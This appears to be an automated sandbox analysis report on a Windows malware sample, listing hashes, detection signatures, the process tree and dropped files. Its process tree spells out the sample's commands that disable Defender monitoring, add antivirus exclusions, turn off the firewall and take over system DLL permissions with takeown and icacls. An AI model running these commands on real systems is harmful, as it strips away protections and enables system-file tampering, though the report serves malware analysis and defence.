Analysis

  • max time kernel
    141s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    05-11-2024 07:32

General

  • Target

    SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe

  • Size

    125KB

  • MD5

    a293e528bd51b9d91da21e8cbfa8e5f5

  • SHA1

    c82ecf0733270f0807cb86bad5e1c0126284fd62

  • SHA256

    4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5

  • SHA512

    9223707eff3ac89eef7aed38d761926d4d17fafb1ff302ee35e5940fe30a3a7f478d5d59bb3c4864f4c25f2b34af2e769cea298826fdfe65f0c62009e879c020

  • SSDEEP

    3072:6KnT6V9P0IbarstiLniYqANZcfBuydIvRuX1FH4zUFluD:6m6VunedBuydVFH4zUF

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 14 IoCs
  • Modifies file permissions 1 TTPs 14 IoCs
  • File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe"
    1⤵
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1592
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1000
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1620
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2616
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2316
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:2632
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c dism /Online /enable-feature /FeatureName:"DirectPlay" /All
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\SysWOW64\Dism.exe
        dism /Online /enable-feature /FeatureName:"DirectPlay" /All
        3⤵
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:2656
    • C:\Windows\SysWOW64\takeown.exe
      takeown /f "C:\Windows\system32\ksuser.dll" /A
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2820
    • C:\Windows\SysWOW64\takeown.exe
      takeown /f "C:\Windows\system32\ksuser.dll"
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2708
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant Administrators:(F,DE)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2560
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant "Admin":(F,DE)
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2576
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /inheritance:d
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2516
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /setowner "NT SERVICE\TrustedInstaller
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2584
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "NT SERVICE\TrustedInstaller":F
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2044
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "Administrators":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1932
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser.dll /grant:r "Admin":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:840
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /inheritance:d
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:672
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /setowner "NT SERVICE\TrustedInstaller
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2720
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "NT SERVICE\TrustedInstaller":F
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2728
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "Administrators":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:2260
    • C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\system32\ksuser64.dll /grant:r "Admin":RX
      2⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • System Location Discovery: System Language Discovery
      PID:1632

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    6617a2f11084bb9893c3ab1b4bd073eb

    SHA1

    0090c4dade877b98a5df88389d7132e420155594

    SHA256

    b6a591da0da6d461559d478e474ea6b4884e97eb4bf5b1db59718c052527ce5d

    SHA512

    c96e5dcce3b8897d7102d86e274d30b4982fd2cb3fdfb0d13a4e8664ac7ebe82dccae37b7996376a3f19f5f6d10cc66957f0258d178526620e459f29dca6490e

  • C:\Windows\SysWOW64\ksuser.dll

    Filesize

    118KB

    MD5

    d5f3ecad923278e96bbbb6796f0bbca5

    SHA1

    9c54ba7de2d02306e3fcfa949163f10086c3ca3b

    SHA256

    447ae50e3e916b31ca861c97e9aab69301cec7ac9f1e527c07048ea7cba81807

    SHA512

    9c27b05c497ba2662b93092d848c02ae3cadc8096618df488371be03859dc701e3d167745507b23a017c4d35b96cf285642af75f13ee749bafa891d25c671e5a

  • memory/1592-4-0x0000000074151000-0x0000000074152000-memory.dmp

    Filesize

    4KB

  • memory/1592-6-0x0000000074150000-0x00000000746FB000-memory.dmp

    Filesize

    5.7MB

  • memory/1592-5-0x0000000074150000-0x00000000746FB000-memory.dmp

    Filesize

    5.7MB

  • memory/1592-7-0x0000000074150000-0x00000000746FB000-memory.dmp

    Filesize

    5.7MB

  • memory/1592-8-0x0000000074150000-0x00000000746FB000-memory.dmp

    Filesize

    5.7MB

  • memory/1592-9-0x0000000074150000-0x00000000746FB000-memory.dmp

    Filesize

    5.7MB

  • memory/2324-0-0x0000000001320000-0x000000000137C000-memory.dmp

    Filesize

    368KB

  • memory/2324-1-0x0000000000030000-0x0000000000033000-memory.dmp

    Filesize

    12KB

  • memory/2324-26-0x0000000001320000-0x000000000137C000-memory.dmp

    Filesize

    368KB